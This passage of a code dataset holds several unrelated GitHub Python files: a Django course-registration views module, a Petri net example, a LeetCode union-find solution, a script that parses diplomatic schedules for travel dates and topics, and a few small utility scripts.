request.method == 'POST':\n        nuid = student_id\n        course_id = int(request.POST['course_number'])\n\n        advisor_id = getAdvisorByStudentId(student_id)\n\n        cursor.execute('''SELECT * from registration''')\n        all_registration_info = cursor.fetchall()\n\n        if course_id not in course_currently_taking:\n            return HttpResponse('You cannot drop this course')\n        elif nuid != student_id:\n            return HttpResponse('Please correct your nuid.')\n        else:\n\n            cursor.execute('''DELETE FROM registration WHERE nuid = %(nuid)s AND course_id = %(course_id)s ''',\n                           {'nuid': nuid, 'course_id': course_id})\n            updateEnrolledStudents(course_id)\n            return HttpResponse('Drop succeeded')\n\n    res = {\n        'student_id': int(student_id),\n        'course_taking': [],\n    }\n\n    for course in range(len(course_currently_taking)):\n        res['course_taking'].append({'course_num': str(course_currently_taking[course]), 'course_name':\n                                     getNameByCourseNum(course_currently_taking[course]),\n                                     'status': getStudentCourseStatus(student_id, course_currently_taking[course])})\n\n    context = {\n        \"data\": res\n    }\n\n    cursor.close()\n    return render(request, 'student/drop_course.html', context)\n\n\ndef getDegreeAudit(request, student_id):\n    cursor = connection.cursor()\n    res = {\n        'student_id': int(student_id),\n        'overall_gpa': [],\n        'in_progress': [],\n        'complete_list': [],\n        'grade': [],\n        'cumulative_pts': [],\n        'cumulative_sh': [],\n    }\n\n    # Build in progress print list.\n    for ea in getCourseInProgress(student_id):\n        res['in_progress'].append({'course_id': str(ea), 'course_name': getNameByCourseNum(ea), 'grade': 'IP'})\n\n    # Get the course list that the student has completed.\n    cursor.execute('''SELECT * FROM registration WHERE (status = 'failed' OR status = 'completed') ''')\n    comp_list = cursor.fetchall()\n\n    # grade_map = {4.00: 'A', 3.66: 'A-', 3.33: 'B+', 3: 'B', 2.66: 'B-', 2.33: 'C+', 2.00: 'C', 1.66: 'C-',\n    #              1.33: 'D+', 1.00: 'D', 0: 'F'}\n\n    cum_sh = 0\n    cum_gpa = 0.0\n\n    for comp in comp_list:\n        if comp[0] == int(student_id):\n            course_id = comp[1]\n            course_id = {'course_id': int(course_id)}\n            cursor.execute('''SELECT semester_hrs FROM course WHERE course_id = %(course_id)s''', course_id)\n            # Semester hours.\n            sh = cursor.fetchall()[0][0]\n            cum_sh += sh\n            cum_gpa += sh * min(4.0, comp[3])\n            res['complete_list'].append({'course_id': comp[1], 'grade': getGrade(comp[3]),\n                                         'course_name': getCourseNameByCourseNum(comp[1]),\n                                         'points_earned': sh * min(4.0, comp[3])})\n\n    res['cumulative_sh'].append(\"Cumulative Semester Hours: \" + str(round(cum_sh, 2)))\n    res['cumulative_pts'].append(\"Cumulative Points: \" + str(round(cum_gpa, 2)))\n    if cum_sh == 0:\n        res['overall_gpa'].append(\"Overall GPA: \" + str(0))\n    else:\n        res['overall_gpa'].append(\"Overall GPA: \" + str(calculateStudentGpa(student_id)))\n    updateStudentGpa(student_id)\n\n    context = {\n        \"data\": res\n    }\n\n    cursor.close()\n    return render(request, 'student/degree_audit.html', context)\n\n\ndef getRegistrationInfo(request, student_id):\n    cursor = connection.cursor()\n    for c in getCourseNumList():\n        updateEnrolledStudents(c)\n    # Submit course registration form.\n    if request.method == 'POST':\n        nuid = student_id\n        course_id = int(request.POST['course_number'])\n        advisor_id = getAdvisorByStudentId(student_id)\n\n        cursor.execute('''SELECT * from registration''')\n        all_registration_info = cursor.fetchall()\n        cursor.execute('''SELECT employee_id from advisor''')\n        advisor_list = cursor.fetchall()\n\n        # Invalid case 1: the student has already submitted this registration form or has taken the course previously.\n        for i in 
range(len(all_registration_info)):\n            if nuid == all_registration_info[i][0] and course_id == all_registration_info[i][1]:\n                return HttpResponse('Error, you cannot submit the same form.')\n        if course_id not in getCourseNumList():\n            return HttpResponse('The course number you entered is not in the course list, '\n                                'please input a correct course number.')\n        elif isCourseFull(course_id):\n            return HttpResponse('The course you registered for has reached the capacity')\n        elif getStudentCurSh(student_id, course_id) > getStudentMaxSh(student_id):\n            return HttpResponse('You have reached the maximum semester hour courses you can register')\n        elif isConflict(student_id, course_id):\n            return HttpResponse('There is a time conflict on your schedule, you cannot register this course')\n        else:\n            Registration.objects.create(nuid=nuid, course_id=course_id, advisor_id=advisor_id, grade=None,\n                                        status='pending')\n            return HttpResponse(\"Registration succeeded, please wait for the advisor to approve\")\n\n    nuid = int(student_id)\n    res = {\n        'student_id': int(nuid),\n        'course_list': [],\n        'complete_courses': [],\n        'pending_list': [],\n    }\n\n    for course in getAllCourseInfo():\n        res['course_list'].append({'course_num': course[0], 'course_name': course[1],\n                                   'instructor': getInstructorNameById(course[2]), 'meeting_time': str(course[3]),\n                                   'date': course[12],\n                                   'capacity': course[4], 'semester': course[5],\n                                   'semester_hrs': course[6],\n                                   'cur_registered': course[7]})\n\n    res['complete_courses'] = getCompleteCoursesByNuid(nuid)\n\n    context = {\n        \"data\": res\n    }\n\n    cursor.close()\n    return render(request, 'student/course_registration.html', context)\n\n\n# This method takes two variables; arr is a fetched two-dimensional array.\n# It checks whether the employee_id is valid or not.\ndef isValidAdvisorId(arr, employee_id):\n    for i in range(len(arr)):\n        if employee_id == arr[i][0]:\n            return True\n\n    return False\n\n\ndef getNameByCourseNum(course_id):\n    cursor = connection.cursor()\n    course_id = {'course_id': course_id}\n    cursor.execute('''SELECT course_name FROM course WHERE course_id = %(course_id)s''', course_id)\n    # fetch the result before closing the cursor; fetching after close raises an error\n    res = cursor.fetchall()[0][0]\n    cursor.close()\n\n    return res\n\n\n# Retrieve all information from the course list.\ndef getCourseList():\n    cursor = connection.cursor()\n    res = []\n    cursor.execute('''SELECT * FROM course''')\n    course_list = cursor.fetchall()\n    if course_list:\n        for course_id in course_list:\n            res.append(course_id)\n\n    cursor.close()\n    return res\n\n\n# Takes a student NUID, queries the registration table, and retrieves all course ids that the student has completed.\ndef getCompleteCoursesByNuid(student_id):\n    cursor = connection.cursor()\n    res = []\n    student_id = {'student_id': student_id}\n    cursor.execute('''SELECT course_id FROM registration WHERE nuid = %(student_id)s AND status = 'completed' ''',\n                   student_id)\n    results = cursor.fetchall()\n\n    if results:\n        for r in results:\n            res.append(r[0])\n    cursor.close()\n\n    return res\n\n\n# Student Table\n# Get semester hour courses student registered.\ndef getStudentCurSh(student_id, course_id):\n    sh = 0\n    cursor = connection.cursor()\n    for c in getCourseCurrentlyTakingOrPending(student_id):\n        cursor.execute('''SELECT semester_hrs FROM course where course_id = %(course_id)s ''',\n                       {'course_id': c})\n        sh += cursor.fetchall()[0][0]\n\n    cursor.execute('''SELECT semester_hrs FROM course where course_id = %(course_id)s ''',\n                   {'course_id': course_id})\n    sh += cursor.fetchall()[0][0]\n\n    return sh\n\ndef getStudentMaxSh(student_id):\n    cursor = connection.cursor()\n    
cursor.execute('''SELECT semesterhour FROM student WHERE nuid = %(student_id)s''',\n                   {'student_id': student_id})\n    res = cursor.fetchall()[0][0]\n    cursor.close()\n\n    return res\n\n# Get student id list.\ndef getStudentIdList():\n    cursor = connection.cursor()\n    cursor.execute('''SELECT nuid FROM student''')\n    res = cursor.fetchall()\n    cursor.close()\n\n    return [r[0] for r in res]\n\n\n# Given a student nuid, check if this nuid is in the student list.\ndef isValidNuid(student_id):\n    cursor = connection.cursor()\n    cursor.execute('''SELECT nuid FROM student''')\n    nuids = [r[0] for r in cursor.fetchall()]\n    cursor.close()\n\n    return student_id in nuids\n\n\n# Given a student id, calculate the cumulative GPA that the student has so far.\ndef calculateStudentGpa(student_id):\n    cursor = connection.cursor()\n    cursor.execute('''SELECT * FROM registration WHERE (status = 'failed' OR status = 'completed') ''')\n    comp_list = cursor.fetchall()\n\n    cum_sh = 0\n    cum_gpa = 0.0\n\n    if comp_list:\n        for comp in comp_list:\n            if comp[0] == int(student_id):\n                cursor.execute('''SELECT semester_hrs FROM course WHERE course_id = %(course_id)s''',\n                               {'course_id': comp[1]})\n                # Semester hours.\n                sh = cursor.fetchall()[0][0]\n                cum_sh += sh\n                cum_gpa += sh * min(4.0, comp[3])\n\n    cursor.close()\n    if cum_sh == 0:\n        return 0\n    return round(cum_gpa / cum_sh, 2)\n\n\n# The method takes a student nuid as input and stores the recomputed GPA on the student record.\ndef updateStudentGpa(student_id):\n    cursor = connection.cursor()\n    gpa = calculateStudentGpa(student_id)\n    cursor.execute('''UPDATE student SET grade = %(gpa)s WHERE nuid = %(student_id)s ''',\n                   {'gpa': gpa, 'student_id': student_id})\n    cursor.close()\n\n\n# Update all students' GPA in the student list.\ndef updateAllStudentGpa():\n    for s in getStudentIdList():\n        updateStudentGpa(s)\n\n\n# Registration Table\n# Get all information from the registration table.\ndef getAllRegistrationInfo():\n    cursor = connection.cursor()\n    cursor.execute('''SELECT * FROM registration''')\n    res = cursor.fetchall()\n    cursor.close()\n\n    return res\n\n\n# Remove rows whose status equals 'rejected' from the registration table.\ndef removeRejFromRegistration():\n    cursor = connection.cursor()\n    cursor.execute('''DELETE FROM registration WHERE status = 'rejected' ''')\n    cursor.close()\n\n\n# The method takes a course number and a student id, returns the status of the student for this course.\ndef getStudentCourseStatus(student_id, course_id):\n    cursor = connection.cursor()\n    cursor.execute('''SELECT status FROM registration WHERE nuid = %(student_id)s AND\n                   course_id = %(course_id)s''', {'student_id': student_id, 'course_id': course_id})\n    res = cursor.fetchall()\n    cursor.close()\n\n    if not res:\n        return 'Null'\n    elif res[0][0] == 'pending':\n        return 'Pending for approval'\n\n    return res[0][0]\n\n\n# This method takes a student nuid as input, returns a course number list containing the courses the student is\n# currently taking or that are pending for the advisor to approve.\ndef getCourseCurrentlyTakingOrPending(student_id):\n    cursor = connection.cursor()\n    res = []\n    cursor.execute('''SELECT course_id FROM registration where nuid = %(student_id)s AND (status = 'approved' OR\n                   status = 'pending') ''', {'student_id': student_id})\n    for c in cursor.fetchall():\n        res.append(c[0])\n    cursor.close()\n    return res\n\n\n# The method takes a student nuid as input, returns a list containing the courses the student is currently taking.\ndef getCourseInProgress(student_id):\n    cursor = connection.cursor()\n    cursor.execute('''SELECT course_id FROM registration WHERE nuid = %(student_id)s AND status = 'approved'\n                   ''', {'student_id': student_id})\n    res = []\n\n    for data in cursor.fetchall():\n        
res.append(data[0])\n    cursor.close()\n\n    return res\n\n\n# Input takes a student NUID, get all course numbers for which the student submitted a registration form that is\n# still pending advisor approval.\ndef getPendingApprovals(student_id):\n    cursor = connection.cursor()\n    res = []\n    student_id = {'student_id': int(student_id)}\n    cursor.execute('''SELECT course_id FROM registration WHERE status = 'pending' AND nuid = %(student_id)s''',\n                   student_id)\n    pending_list = cursor.fetchall()\n    if pending_list:\n        for r in pending_list:\n            if r[0] in res:\n                continue\n            res.append(r[0])\n\n    cursor.close()\n    return res\n\n\n# Advisor Table\n# The method takes a student nuid as input, returns the student's advisor id.\ndef getAdvisorByStudentId(student_id):\n    cursor = connection.cursor()\n    student_id = {'student_id': student_id}\n    cursor.execute('''SELECT advisor FROM student WHERE nuid = %(student_id)s''', student_id)\n    res = cursor.fetchall()[0][0]\n    cursor.close()\n    return res\n\n\n# Admin Table\n\n\n# Course Table\n# Update student enrollment of designated courses based on the information in the Registration table.\ndef updateEnrolledStudents(course_id):\n    cursor = connection.cursor()\n    stu_enrollment = 0\n    cursor.execute('''SELECT * FROM registration WHERE course_id = %(course_id)s''', {'course_id': course_id})\n\n    for ea in cursor.fetchall():\n        if ea[4] == 'approved':\n            stu_enrollment += 1\n    cursor.execute('''UPDATE course set registered_num_of_stud = %(stu_enrollment)s WHERE course_id = \n    %(course_id)s ''', {'stu_enrollment': stu_enrollment, 'course_id': course_id})\n    cursor.close()\n\n\n# Get course time by course id.\ndef getCourseTime(course_id):\n    res = []\n    cursor = connection.cursor()\n    cursor.execute('''SELECT meeting_time FROM course WHERE course_id = %(course_id)s''', {'course_id': course_id})\n    res.append(str(cursor.fetchall()[0][0]))\n    cursor.execute('''SELECT date FROM course WHERE course_id = %(course_id)s''', {'course_id': course_id})\n\n    res.append(str(cursor.fetchall()[0][0]))\n    cursor.close()\n\n    return res\n\n\n# The method takes a course id as input, returns whether the course has reached its capacity.\ndef isCourseFull(course_id):\n    cursor = connection.cursor()\n    cursor.execute('''SELECT max_num_of_students FROM course WHERE course_id = %(course_id)s''',\n                   {'course_id': course_id})\n    cap = cursor.fetchall()[0][0]\n    cursor.execute('''SELECT registered_num_of_stud FROM course WHERE course_id = %(course_id)s''',\n                   {'course_id': course_id})\n    cur_num = cursor.fetchall()[0][0]\n    cursor.close()\n    return cur_num >= cap\n\n\n# Course Table\ndef getCourseNameByCourseNum(course_num):\n    cursor = connection.cursor()\n    cursor.execute('''SELECT course_name FROM course WHERE course_id = %(course_num)s''', {'course_num': course_num})\n    res = cursor.fetchall()\n    cursor.close()\n\n    return res[0][0]\n\n\n# Get all information from the course table.\ndef getAllCourseInfo():\n    cursor = connection.cursor()\n    cursor.execute('''SELECT * FROM course''')\n    res = cursor.fetchall()\n    cursor.close()\n\n    return res\n\n\n# Get course number list.\ndef getCourseNumList():\n    cursor = connection.cursor()\n    cursor.execute('''SELECT course_id FROM course''')\n    res = []\n\n    for c in cursor.fetchall():\n        res.append(c[0])\n    cursor.close()\n\n    return res\n\n# Instructor Table\ndef getInstructorNameById(instructor_id):\n    cursor = connection.cursor()\n    cursor.execute('''SELECT name FROM instructor WHERE employee_id = %(employee_id)s ''',\n                   {'employee_id': instructor_id})\n    res = cursor.fetchall()\n    cursor.close()\n\n    if res:\n        return res[0][0]\n\n    return \"\"\n\n\n# Util Library\ndef 
timeConversion(date, time):\n    date_map = {'M': 1, 'T': 2, 'W': 3, 'Th': 4, 'F': 5, 'S': 6, 'Su': 7}\n    # Convert to minutes.\n    one_day = 24 * 60\n    hour = int(time[0 : 2])\n    minute = int(time[3 : 5])\n    time_to_min = one_day * (date_map[date] - 1) + hour * 60 + minute\n\n    return time_to_min\n\n\ndef isConflict(student_id, course_id):\n    course_time = getCourseTime(course_id)\n    if course_time[1] is None:\n        return False\n\n    abs_course_time = timeConversion(course_time[1], course_time[0])\n    reg_courses_time_interval = []\n\n    for interval in getAllRegistrationInfo():\n        if interval[0] == student_id and (interval[4] == 'pending' or interval[4] == 'approved'):\n            course = interval[1]\n            ct = timeConversion(getCourseTime(course)[1], getCourseTime(course)[0])\n            reg_courses_time_interval.append([ct, ct + 180])\n\n    for ea in reg_courses_time_interval:\n        if ea[0] < abs_course_time + 180 < ea[1] or ea[0] < abs_course_time < ea[1]:\n            return True\n\n    return False\n\n\n# Grade letter gpa conversion:\n# A+: 4.33 A: 4.00 A-: 3.66\n# B+: 3.33 B: 3.00 B-: 2.66\n# C+: 2.33 C: 2.00 C-: 1.66\n# D+: 1.33 D: 1.00 D-: 0.66\n# F: 0.00\ndef getGrade(grade):\n    if grade < 0.66:\n        return 'F'\n    if grade < 1.0:\n        return 'D-'\n    if grade < 1.33:\n        return 'D'\n    if grade < 1.66:\n        return 'D+'\n    if grade < 2:\n        return 'C-'\n    if grade < 2.33:\n        return 'C'\n    if grade < 2.66:\n        return 'C+'\n    if grade < 3:\n        return 'B-'\n    if grade < 3.33:\n        return 'B'\n    if grade < 3.66:\n        return 'B+'\n    if grade < 4.00:\n        return 'A-'\n    if grade < 4.33:\n        return 'A'\n\n    return 'A+'\n","repo_name":"smoring2/khouryWebRegistration","sub_path":"studentInfo/student_views.py","file_name":"student_views.py","file_ext":"py","file_size_in_byte":18734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12117452696","text":"from random import choice\nfrom petri_net import Place, PetriNet, Transition, In, Out\n\n# initialize list of tokens\nM0 = [1, 2, 3, 2]\nps = [Place(m) for m in M0]\n\n# create graph of PetriNet\n\"\"\"\nExample:\n---------------<--------------------\n|                                  |\n|--> P0 --> *T1* --> P1 --> *T2* --|\n        |           /   \\\n        |          /     \\---> P3\n        P2 -------/\n\"\"\"\nts = dict(\n    t1=Transition(\n        [In(ps[0])],\n        [Out(ps[1]), Out(ps[2])]\n    ),\n    t2=Transition(\n        [In(ps[1]), In(ps[2])],\n        [Out(ps[3]), Out(ps[0])]\n    )\n)\n\nnum_fires = 3\n# randomly pick transitions to fire from the dict of transitions\nfiring_sequence = [choice(list(ts.keys())) for _ in range(num_fires)]\n\n# Or you can hand-pick which transitions will fire (length = num_fires)\n# firing_sequence = ['t1', 't2', 't1']\n\nnetwork = PetriNet(ts)\nnetwork.run(firing_sequence, ps)\n","repo_name":"doantienthongbku/petrinet_python","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9237597956","text":"class Solution:\n    def removeStones(self, stones: List[List[int]]) -> int:\n        n=len(stones)\n        par={i:i for i in range(n)}\n        rank=[1]*n\n        def find(st):\n            while par[st]!=st:\n                par[st]=par[par[st]]\n                st=par[st]\n            return st\n        def union(st1,st2):\n            \n            parst1=find(st1)\n            parst2=find(st2) \n            if parst1!=parst2 :\n                if rank[parst1]>rank[parst2]:\n                    par[parst2]=parst1\n                    rank[parst1]+=rank[parst2]\n                    rank[parst2]=0\n                else:\n                    par[parst1]=parst2\n                    rank[parst2]+=rank[parst1]  \n                    rank[parst1]=0  \n        for i in range(n):\n            row1,col1=stones[i]\n            for j in range(i+1,n):\n                row2,col2=stones[j]\n                if row1==row2 or col1==col2:\n                    union(i,j)\n\n        for i in rank:\n            if i!=0:\n                n-=1\n        return 
n\n","repo_name":"Zablon5/A2SV","sub_path":"July(2023)-week-2/leet-code-947.py","file_name":"leet-code-947.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39069496207","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 16 10:05:26 2022\n\n@author: xintao\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime\nimport re\n\n\ndef travel_destinations(text):\n# Read info about travel destinations in text\n if \"travel to\" not in text and 'travels to' not in text:\n raise ValueError('No travel info in input!')\n else:\n tx=text\n a=tx.find('travel to')\n if a!=-1:\n a=a+10\n else:\n a=tx.find('travels to')+11\n b1=tx[a:].find(' from ')\n b2=tx[a:].find(' on ')\n b3=tx[a:].find('.')\n b4=tx[a:].find(' January')\n b5=tx[a:].find(' February') \n b6=tx[a:].find(' March')\n b7=tx[a:].find(' April')\n b8=tx[a:].find(' May')\n b9=tx[a:].find(' June')\n b10=tx[a:].find(' July')\n b11=tx[a:].find(' August') \n b12=tx[a:].find(' September')\n b13=tx[a:].find(' October')\n b14=tx[a:].find(' November')\n b15=tx[a:].find(' December')\n b16=tx[a:].find(' to ')\n if b1==-1:\n b1=1000\n if b2==-1:\n b2=1010\n if b3==-1:\n b3=1000\n if b4==-1:\n b4=1000\n if b5==-1:\n b5=1010\n if b6==-1:\n b6=1000\n if b7==-1:\n b7=1000\n if b8==-1:\n b8=1010\n if b9==-1:\n b9=1000\n if b10==-1:\n b10=1000\n if b11==-1:\n b11=1010\n if b12==-1:\n b12=1000\n if b13==-1:\n b13=1000\n if b14==-1:\n b14=1010\n if b15==-1:\n b15=1000\n if b16==-1:\n b16=1000\n b=min(b1,b2,b3,b4,b5,b6,b7,b8,b9,b10,b11,b12,b13,b14,b15,b16)\n places=tx[a:a+b]\n return countries_in_it(places)\n\ndef fix_dates(text):\n # correct dates format and spelling in text\n month_list=['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December', 'Oct']\n for mon in month_list:\n loc=text.find(mon)\n if loc!=-1:\n correct=text[loc-1:loc+len(mon)+1]\n if correct[-1]!=' ':\n # handles the case where space is missing\n text=text.replace(mon,mon+' ')\n if correct[0]!=' ':\n # handles the case where space is missing\n text=text.replace(mon,' '+mon)\n return text\n \n \ndef travel_dates(dates,text):\n # Read travel related dates in text\n dates=datetime.strptime(dates,\"%d-%b-%y\")\n mts={'January':1,\n 'February':2,\n 'March':3,\n 'April':4,\n 'May':5,\n 'June':6,\n 'July':7,\n 'August':8,\n 'September':9,\n 'October':10,\n 'November':11,\n 'December':12,\n 'Oct':11,\n }\n if \"travel to\" not in text and 'travels to' not in text:\n #raise ValueError('No travel info in input!')\n mts\n else:\n tx=fix_dates(text)\n a=tx.find('travel to')\n if a!=-1:\n a=a+10\n else:\n a=tx.find('travels to')+11\n tx=tx[a:]\n year_list=np.arange(1990,2030).astype(str)\n month_list=list(mts.keys())\n \n months=[]\n days=[]\n\n tx=tx.replace('–',' ')\n tx=tx.replace('-',' ')\n tx=tx.replace('—',' ')\n tx=tx.replace(',',' ')\n tx=tx.replace(';',' ')\n tx=tx.replace('.',' ')\n txl=tx.split(' ')\n for txi in txl:\n if txi.isdigit():\n if int(txi)<1000:\n days.append(txi)\n if txi in month_list:\n months.append(txi)\n monthdigit=[] \n for mon in months:\n monthdigit.append(mts[mon])\n \n monthdigit=list(set(monthdigit))\n\n if len(monthdigit)==1 and len(days)==1:\n start_date=str(monthdigit[0])+'-'+days[0]\n end_date=str(monthdigit[0])+'-'+days[0]\n \n if len(monthdigit)==1 and len(days)==2:\n start_date=str(monthdigit[0])+'-'+days[0]\n 
end_date=str(monthdigit[0])+'-'+days[1]\n \n if len(monthdigit)==2 and len(days)==1:\n start_date=str(monthdigit[0])+'-'+days[0]\n end_date=str(monthdigit[1])+'-'+days[0] \n \n if len(monthdigit)==2 and len(days)==2:\n start_date=str(monthdigit[0])+'-'+days[0]\n end_date=str(monthdigit[1])+'-'+days[1]\n \n if len(monthdigit)==1 and len(days)>2:\n start_date=str(monthdigit[0])+'-'+days[0]\n end_date=str(monthdigit[0])+'-'+days[-1]\n try: \n start_date=start_date+'-'+str(dates.year)\n end_date=end_date+'-'+str(dates.year)\n start_date=datetime.strptime(start_date,\"%m-%d-%Y\").date()\n end_date=datetime.strptime(end_date,\"%m-%d-%Y\").date()\n \n except: \n start_date=dates.date()\n end_date=dates.date()\n return start_date,end_date\n \n\ndef countries_in_it(text):\n # find all countries in text\n country_lookup=pd.read_csv('../Data/Forms/country_lookup.csv',index_col=0)\n countries=[]\n for a in list(country_lookup.Names):\n if a in text:\n countries.append(a)\n \n for a in list(country_lookup.Full_Names):\n if a in text:\n c=country_lookup.Names[country_lookup.Full_Names==a]\n countries.append(list(c)[0])\n \n for a in list(country_lookup.Capital):\n if a in text:\n c=country_lookup.Names[country_lookup.Capital==a]\n countries.append(list(c)[0])\n for a in list(country_lookup.Adjs):\n if a in text:\n c=country_lookup.Names[country_lookup.Adjs==a]\n countries.append(list(c)[0])\n countries=list(set(countries))\n if len(countries)==0:\n return ['Domestic']\n else:\n return countries\n\n\n \ndef make_travel_places_rank_date():\n A=pd.read_csv('../Data/Mid_data/Trump/trump_3_line_processed.csv',index_col=0)\n Rank=pd.read_csv('../Data/Forms/ranks_trump.csv',index_col=1)\n places=[]\n start_dates=[]\n end_dates=[]\n types=[]\n Ranks=[]\n Topics=[]\n Meet_countries=[]\n for i,text in enumerate(A.Texts): \n Topics.append(topics_in_it(text))\n Ranks.append(Rank.loc[A.Lastnames[i]].Rank)\n if \"travel to\" in text or 'travels to' in text:\n types.append('Travel')\n Meet_countries.append('')\n else:\n if 'attends meetings and briefings at the Department of State.' not in text and ('meet' in text.lower() or 'attend' in text.lower()):\n types.append('Meeting')\n countries_=countries_in_it(text)\n countries=''\n for country in countries_:\n countries=countries+' ; '+country\n \n Meet_countries.append(countries)\n \n else:\n types.append('TBD')\n Meet_countries.append('')\n try: \n pl=travel_destinations(text)\n place=''\n for p in pl:\n place=place+' ; '+p\n places.append(place)\n \n except:places.append(' ')\n try: \n start_date,end_date=travel_dates(A.Dates[i],text)\n start_dates.append(start_date)\n end_dates.append(end_date)\n except:\n start_dates.append('')\n end_dates.append('')\n A['Rank']=Ranks\n A['Type']=types\n A['Travel_Places']=places\n A['Travel_Start_Date']=start_dates\n A['Travel_End_Date']=end_dates\n A['Link_Content']=[' ']*len(A.Rank)\n A['Topics']=Topics\n A['Meet_countries']=Meet_countries\n A.to_csv('../Data/Mid_data/Trump/trump_4_test.csv') \n \n A=pd.read_csv('../Data/Mid_data/Biden/biden_3_line_processed.csv',index_col=0)\n Rank=pd.read_csv('../Data/Forms/ranks_biden.csv',index_col=1)\n places=[]\n start_dates=[]\n end_dates=[]\n types=[]\n Ranks=[]\n Topics=[]\n Meet_countries=[]\n for i,text in enumerate(A.Texts): \n Topics.append(topics_in_it(text))\n Ranks.append(Rank.loc[A.Lastnames[i]].Rank)\n if \"travel to\" in text or 'travels to' in text:\n types.append('Travel')\n Meet_countries.append('')\n else:\n if 'attends meetings and briefings at the Department of State.' 
not in text and ('meet' in text.lower() or 'attend' in text.lower()):\n types.append('Meeting')\n countries_=countries_in_it(text)\n countries=''\n for country in countries_:\n countries=countries+' ; '+country\n \n Meet_countries.append(countries)\n else:\n types.append('TBD')\n Meet_countries.append('')\n try:\n pl=travel_destinations(text)\n place=''\n for p in pl:\n place=place+' ; '+p\n places.append(place)\n \n except:places.append(' ')\n try: \n start_date,end_date=travel_dates(A.Dates[i],text)\n start_dates.append(start_date)\n end_dates.append(end_date)\n except:\n start_dates.append('')\n end_dates.append('')\n A['Rank']=Ranks\n A['Type']=types\n A['Travel_Places']=places\n A['Travel_Start_Date']=start_dates\n A['Travel_End_Date']=end_dates\n A['Link_Content']=[' ']*len(A.Rank)\n A['Topics']=Topics\n A['Meet_countries']=Meet_countries\n A.to_csv('../Data/Mid_data/Biden/biden_4_test.csv')\n\n\ndef topics_in_it(text):\n # find topics in text\n topics=[]\n security=['arms control','strategic','security','weapons','NATO']\n sec_org=['NATO','AUKUS']\n food=['food','grain','rice']\n tech=['technology',' 5g ',' ict ','artificial intelligence']\n biotech=['COVID','medical',' vaccine','bio-tech','biotech','Hygiene','Sanitation'] \n econ=['economic','trade','tariff','business','commerce','economy','investment'] \n io=['International Development Finance Corporation',' World Bank ','health',' WTO ',' IMF ', ' ITU ','UNICEF','G7'] \n nuke=['nuclear','proliferation']\n supply_chain=['supply chain','semi-conductor']\n UN=[' UN ','U.N.','United Nation']\n ASEAN=['ASEAN ','IPEF ','CPTPP ','RECP ', 'Indo Pacific']\n climate=['climate','emission',' CO2 ','carbon']\n energy=['energy',' oil ', ' petro ', ' battery ']\n finance=['Banking','finance','financial']\n China=['chinese','china','taiwan','taiwanese','hong kong','tibet','xinjiang']\n \n if any([s.lower() in text.lower() for s in security])==True:\n topics.append('security')\n if any([s.lower() in text.lower() for s in food])==True:\n topics.append('food')\n if any([s.lower() in text.lower() for s in tech])==True:\n topics.append('tech')\n if any([s.lower() in text.lower() for s in biotech])==True:\n topics.append('bio-tech')\n if any([s.lower() in text.lower() for s in econ])==True:\n topics.append('econ')\n if any([s.lower() in text.lower() for s in io])==True:\n topics.append('international_organization')\n if any([s.lower() in text.lower() for s in nuke])==True:\n topics.append('nuke')\n if any([s.lower() in text.lower() for s in supply_chain])==True:\n topics.append('supply_chain')\n if any([s.lower() in text.lower() for s in climate])==True:\n topics.append('climate')\n if any([s.lower() in text.lower() for s in energy])==True:\n topics.append('climate')\n if any([s.lower() in text.lower() for s in finance])==True:\n topics.append('finance')\n if any([s.lower() in text.lower() for s in China])==True:\n topics.append('China')\n if any([s.lower() in text.lower() for s in sec_org])==True:\n topics.append('sec_org')\n if any([s.lower() in text.lower() for s in UN])==True:\n topics.append('UN')\n if any([s.lower() in text for s in ASEAN])==True:\n topics.append('ASEAN')\n \n topic=''\n for topic_ in topics:\n topic=topic+' ; '+topic_\n\n return topic\n\nmake_travel_places_rank_date()","repo_name":"BGMjie/USDataProcess","sub_path":"Process_Code/Biden & 
Trump/4_line_analysis.py","file_name":"4_line_analysis.py","file_ext":"py","file_size_in_byte":12313,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"14152090679","text":"import requests\nimport json \nimport time\n\n\nstart = time.time()\nurl = 'https://recommendation--api.herokuapp.com/'\ndata = 'ledger'\ndata = json.dumps(data)\nrqt = requests.post(url, data)\nend = time.time()\nprint(rqt.json())\nprint('Runtime {:.2f} seconds'.format(end-start))","repo_name":"ZarpLabs/Externship-Program","sub_path":"1st Externship Batch/Recommendation System/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70080338660","text":"def get_discount(amount):\n # Complete this function\n if amount<500:\n discount=\"5%\"\n elif (amount>=500) and (amount<2500):\n discount=\"10%\"\n else:\n discount=\"20%\"\n return discount\n\namount = int(input())\n# Call the get_discount function\nresult=get_discount(amount)\nprint(result)","repo_name":"BhavanDevOps/Full-Stack-Projects","sub_path":"Python Projects/Discount.py","file_name":"Discount.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"21124551936","text":"from django.conf.urls import url\n\nfrom taskmaster import views\n\nurlpatterns = [\n url(r'^$', views.jobgroups, name='jobgroups'),\n url(r'^jobgroups/(?P\\d+)/$', views.jobgroup, name='jobgroup'),\n\n url(r'^kickstart$', views.kickstart, name='kickstart')\n]","repo_name":"ChrisCooper/pipeline-nanny","sub_path":"taskmaster/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"43133865658","text":"import bpy\nfrom . interactive import InteractiveOperator, screen_space_to_3d\nfrom . 
